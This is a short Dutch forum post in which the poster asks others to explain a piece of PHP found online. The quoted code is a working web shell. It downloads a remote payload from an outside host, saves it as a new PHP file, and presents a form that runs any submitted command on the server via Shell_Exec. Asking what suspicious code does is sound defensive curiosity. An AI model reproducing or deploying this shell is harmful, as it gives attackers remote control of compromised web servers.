Ik kwam dit tegen op het internet en ik ben nieuwsgierig wat het inhoudt, kan iemand me uitleggen? maakt niet uit hier, of via pm
PHP
<?php $shell=@file_get_contents("http://ckhostingsolutions.com/templates/beez/template.txt"); $fw=@fopen("ram0b64.php","w"); fputs ($fw, $shell); fclose($fw); ?><html><head><title>load1.php</title></head><onload="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>